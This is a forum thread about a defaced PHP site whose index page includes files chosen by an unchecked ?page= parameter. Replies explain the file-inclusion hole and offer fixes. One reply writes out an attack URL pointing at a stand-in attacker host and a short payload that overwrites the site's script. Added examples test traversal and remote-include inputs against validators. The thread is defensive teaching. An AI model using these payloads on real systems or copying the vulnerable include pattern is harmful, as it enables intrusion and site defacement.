PHP Exploit BUT HOW?

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.


110%Nutter
Forum Newbie
Posts: 2
Joined: Tue Aug 11, 2009 2:33 pm

PHP Exploit BUT HOW?

Post by 110%Nutter »

Hi, I went to look at my website last night and found that my homepage had been replaced by something created by some Muslim Albanian / Kosovo hackers.

I would be interested in hearing from any of you who could pinpoint the weak spot in my code. I'm pretty new to PHP, so it's likely there are some newbie errors in it that let them in!!

Hope to hear from someone soon!!

Code:

<?php
    //loop through the files and see whats there
    $exts = array("php","htm","html");
    $got = 0;
    $folder = "/home/rayj/public_html/pages/";
    if ($_GET["page"] == "") $_GET["page"] = "home/home";
    $page = $folder . $_GET["page"];
    foreach ($exts as $ext) {
        if (file_exists($page . "." . $ext)) {
            $got = $page . "." . $ext;
            break;
        }
    }
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <title>Chris Ray | <?php
        // read the title file and use its contents to name the page
        if (!$got) {
            echo "Page not found...";
        } else if (file_exists($page . ".title")) {
            include ($page . ".title");
        } else {
            echo $_GET["page"];
        }
    ?></title>
    
    <?php
    //include java script files
        if (file_exists($page . ".js")) {
            echo "<script language=\"javascript\">";
            include ($page . ".js");
            echo "</script>";
        }
    ?>
    
    <?php
    //include meta data files
        if (file_exists($page . ".meta")) {
            include ($page . ".meta");
        }
    ?>
    
    <link href="stylesheet.css" rel="stylesheet" type="text/css"/>
    <link rel="shortcut icon" href="assets/favicon.ico"/>
    <link rel="stylesheet" href="assets/cbcscbindex.css" type="text/css" /> 
</head>
<body>
    <div id="top_bg">           
        </div>
        <div id="menu">
            <div id="menu_items">
                <ul id="ebul_cbindex_3" class="ebul_cbindex" style="display: none;">
                    <li><a href="?page=services/raid_calculator/raid_calculator" title="">Raid Calculator</a></li>
                    <li><a href="?page=services/web_hosting/web_hosting" title="">Web Hosting</a></li>
                </ul>           
                <ul id="ebul_cbindex_4" class="ebul_cbindex" style="display: none;">
                    <li><a href="?page=about_me/me/me" title="">Me</a></li>
                    <li><a href="?page=about_me/get_in_touch/get_in_touch" title="">Get In Touch</a></li>
                </ul>
                <ul id="cbindexebul_table" class="cbindexebul_menulist" style="width: 350px; height: 30px;">
                    <li class="spaced_li"><a href="?page=home/home"><img id="cbi_cbindex_1" src="assets/ebbtcbindex1_0.png" name="ebbcbindex_1" width="70" height="30" style="vertical-align: bottom;" border="0" alt="Home" title="" /></a></li>
                    <li class="spaced_li"><a href="?page=projects/projects"><img id="cbi_cbindex_2" src="assets/ebbtcbindex2_0.png" name="ebbcbindex_2" width="70" height="30" style="vertical-align: bottom;" border="0" alt="Projects" title="" /></a></li>
                    <li class="spaced_li"><a><img id="cbi_cbindex_3" src="assets/ebbtcbindex3_0.png" name="ebbcbindex_3" width="70" height="30" style="vertical-align: bottom;" border="0" alt="Services" title="" /></a></li>
                    <li class="spaced_li"><a><img id="cbi_cbindex_4" src="assets/ebbtcbindex4_0.png" name="ebbcbindex_4" width="70" height="30" style="vertical-align: bottom;" border="0" alt="About Me" title="" /></a></li>
                    <li><a href="?page=uni/uni"><img id="cbi_cbindex_5" src="assets/ebbtcbindex5_0.png" name="ebbcbindex_5" width="70" height="30" style="vertical-align: bottom;" border="0" alt="Uni" title="" /></a></li>
                </ul><!-- number 7 test when page missing show error message-->
                <script type="text/javascript" src="assets/cbjscbindex.js"></script>
            </div>
        </div>
        <div id="middle_bg">
            <div id="content">
                <?php
                    if (!$got) {
                        echo "Page not found...";
                    } else {
                        include($got);
                    }
                ?>
            </div>
        <div id="footer">
            <p>Designed by Chris Ray &copy; 2009 <a href="http://validator.w3.org/check?uri=http%3A%2F%2Fwww.rayjchris.co.uk%2F">XHTML</a> | <a href="http://jigsaw.w3.org/css-validator/validator?uri=www.rayjchris.co.uk&profile=css21&usermedium=all&warning=1">CSS</a></p>
        </div>  
    </div>          
    <div id="bottom_bg">
    </div>
</body>
</html>
 
tr0gd0rr
Forum Contributor
Posts: 305
Joined: Thu May 11, 2006 8:58 pm
Location: Utah, USA

Re: PHP Exploit BUT HOW?

Post by tr0gd0rr »

You are including a file with a name based on unscrubbed content in $_GET in the "include($got)" line.

I'm not exactly sure, but I think you can do something like:
http:// domain.com/?page=../../../../http://hacker-domain.com/exploiter.txt

Where exploiter.txt contains something like the following:

Code:

<?php
$php = '<?php echo "pwnd" ?>';
file_put_contents($_SERVER['SCRIPT_FILENAME'], $php);

You should never include files or perform exec() based on unscrubbed user-submitted content.

You could probably run a preg_match() to ensure that $_GET['page'] contains only letters, numbers, slashes for example.

You could also check that the page is within your specified directory (untested):

Code:

$safe = false;
$base = rtrim($folder, '/');      // $folder ends in '/', dirname() results never do
$dirname = rtrim($got, '/');
// walk up through the parent directories; dirname() returns its input unchanged
// once it reaches the root, which is where the loop has to stop
while (($parent = dirname($dirname)) !== $dirname) {
  if ($parent == $base) {
    $safe = true;
    break;
  }
  $dirname = $parent;
}
if (!$safe) {
  $got = $folder . '404.php';
}

110%Nutter
Forum Newbie
Posts: 2
Joined: Tue Aug 11, 2009 2:33 pm

Re: PHP Exploit BUT HOW?

Post by 110%Nutter »

You had an interesting theory. I gave the ?page=../../ a test, but that was stopped with the following error:

Warning: file_exists() [function.file-exists]: open_basedir restriction in effect. File(/home/rayj/public_html/pages

Lines 2 to 15 in my code do something similar to the file location existence checking you were talking about. I'm not sure if yours takes that idea one step further? Would it be worth adding them together?

Could you give me an example of preg_match?

Thanks for your help!!
tr0gd0rr
Forum Contributor
Posts: 305
Joined: Thu May 11, 2006 8:58 pm
Location: Utah, USA

Re: PHP Exploit BUT HOW?

Post by tr0gd0rr »

Ah yes--open_basedir.

The regex would be something like:

Code:

if (preg_match('~[^\w/_-]~', $page)) {
  // not safe
}

And yes, file_exists will ensure that the file exists, but it will not ensure that the file is within your base directory.

I'll look into some other possible exploits; this is interesting.
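An added example, not tr0gd0rr's or the thread's own code, that combines the two checks discussed in the replies above: a regex allow-list on the ?page= value, followed by a realpath() containment check against the pages folder, which is the part a bare file_exists() does not give you. The resolve_page() function, the temporary folder layout and the sample requests are all constructed for the demo.

```php
<?php
// Added example (not from the thread): validate the ?page= value with a regex
// allow-list, then confirm the resolved file really lives under $folder.
// Sample pages are written to a temporary directory so the script runs anywhere.

/**
 * Resolve a page request to a file under $folder, or return null.
 * Accepts only slugs made of letters, digits, '_', '-' and '/' separators.
 */
function resolve_page(string $folder, string $request, array $exts): ?string
{
    // 1. Syntactic check: one or more slug segments separated by single slashes.
    //    This rejects '.', '..', null bytes, absolute paths and URLs outright.
    if (!preg_match('~^[A-Za-z0-9_-]+(?:/[A-Za-z0-9_-]+)*\z~', $request)) {
        return null;
    }

    $base = realpath($folder);
    if ($base === false) {
        return null;
    }

    foreach ($exts as $ext) {
        $candidate = realpath($folder . '/' . $request . '.' . $ext);
        // 2. Semantic check: realpath() collapses symlinks and '..' segments,
        //    so the resolved file must still start with the base directory.
        if ($candidate !== false
            && strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) === 0
            && is_file($candidate)) {
            return $candidate;
        }
    }
    return null;
}

// --- constructed sample site (hypothetical layout) ---------------------------
$folder = sys_get_temp_dir() . '/pages_demo_' . getmypid();
mkdir($folder . '/home', 0700, true);
file_put_contents($folder . '/home/home.php', '<p>Welcome home</p>');
file_put_contents($folder . '/home/home.title', 'Home');
$outside = sys_get_temp_dir() . '/secret_' . getmypid() . '.php';
file_put_contents($outside, '<?php echo "should never be included";');

$exts = ['php', 'htm', 'html'];
$requests = [
    'home/home',                          // legitimate menu link
    '../' . basename($outside, '.php'),   // directory traversal attempt
    'home/../home/home',                  // '..' inside an otherwise valid path
    'http://evil.example/shell.txt',      // remote include attempt
    "home/home\0",                        // null byte after a valid slug
];

foreach ($requests as $r) {
    $file = resolve_page($folder, $r, $exts);
    printf("%-40s => %s\n", json_encode($r),
        $file === null ? 'REJECTED (404)' : 'include ' . basename($file));
}

// cleanup of the constructed files
array_map('unlink', [$folder . '/home/home.php', $folder . '/home/home.title', $outside]);
rmdir($folder . '/home');
rmdir($folder);
```

Only the first request resolves; the other four are refused before any include() runs. The regex alone would already stop them, but the realpath() comparison is kept deliberately, because it also catches a symlink inside the pages folder that points elsewhere, which no pattern on the request string can see.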
kaisellgren
DevNet Resident
Posts: 1675
Joined: Sat Jan 07, 2006 5:52 am
Location: Lahti, Finland.

Re: PHP Exploit BUT HOW?

Post by kaisellgren »

You probably have some other vulnerable scripts there, too. The easiest way to safely include files like that would be to use whitelisting:

Code:

$files = array('home.php', 'contact.php');
if (!in_array($_GET['page'], $files))
    include('404.php');
else
    include($_GET['page']);

No one can now manipulate your inclusions.
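An added example, not kaisellgren's or the thread's code, that takes the whitelisting idea one step further: the allow-list is built once by scanning the pages folder, and the request value is then used only as an array key, so no filesystem path is ever assembled from user input. The build_allow_list() and select_page() functions, the temporary folder and its file names are constructed for the demo.

```php
<?php
// Added example (not from the thread): a whitelist generated from the pages
// directory itself. Traversal, null bytes or URLs in ?page= simply fail the
// key lookup and fall through to the 404 page.

/**
 * Scan $folder once and map each page slug (relative path without extension)
 * to the absolute file that implements it, e.g. 'home/home' => '/.../home/home.php'.
 */
function build_allow_list(string $folder, array $exts): array
{
    $base = realpath($folder);
    $list = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($base, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $file) {
        $ext = strtolower($file->getExtension());
        if (!in_array($ext, $exts, true)) {
            continue;               // .title, .js, .meta side files are not pages
        }
        $rel  = substr($file->getPathname(), strlen($base) + 1);
        $slug = str_replace(DIRECTORY_SEPARATOR, '/', substr($rel, 0, -strlen($ext) - 1));
        if (!isset($list[$slug])) {  // home.php and home.html: keep the first one seen
            $list[$slug] = $file->getPathname();
        }
    }
    return $list;
}

/** Resolve a request strictly against the allow-list; unknown slugs get the 404 page. */
function select_page(?string $request, array $allow, string $notFound): string
{
    if ($request === null || $request === '') {
        $request = 'home/home';      // same default as the original index page
    }
    return array_key_exists($request, $allow) ? $allow[$request] : $notFound;
}

// --- constructed sample site (hypothetical layout) ---------------------------
$folder = sys_get_temp_dir() . '/pages_allow_' . getmypid();
foreach (['home', 'projects'] as $d) {
    mkdir("$folder/$d", 0700, true);
}
file_put_contents("$folder/home/home.php", '<p>home</p>');
file_put_contents("$folder/home/home.title", 'Home');          // side file, not a page
file_put_contents("$folder/projects/projects.html", '<p>projects</p>');
file_put_contents("$folder/404.php", '<p>not found</p>');

$allow = build_allow_list($folder, ['php', 'htm', 'html']);
unset($allow['404']);   // the error page is served by the fallback, never by name
print_r(array_keys($allow));   // home/home and projects/projects only

$requests = ['home/home', '', 'projects/projects', 'home/home.title',
             '../../etc/passwd', "home/home\0"];
foreach ($requests as $r) {
    printf("%-24s => %s\n", json_encode($r),
        basename(select_page($r, $allow, "$folder/404.php")));
}

// cleanup of the constructed files
foreach (array_merge(array_values($allow), ["$folder/home/home.title", "$folder/404.php"]) as $f) {
    unlink($f);
}
rmdir("$folder/home");
rmdir("$folder/projects");
rmdir($folder);
```

The scan runs once per request here for simplicity; on a real site it would be cached or generated at deploy time. The important property is unchanged either way: include() only ever receives a value that came out of the array, never one that came in from the browser.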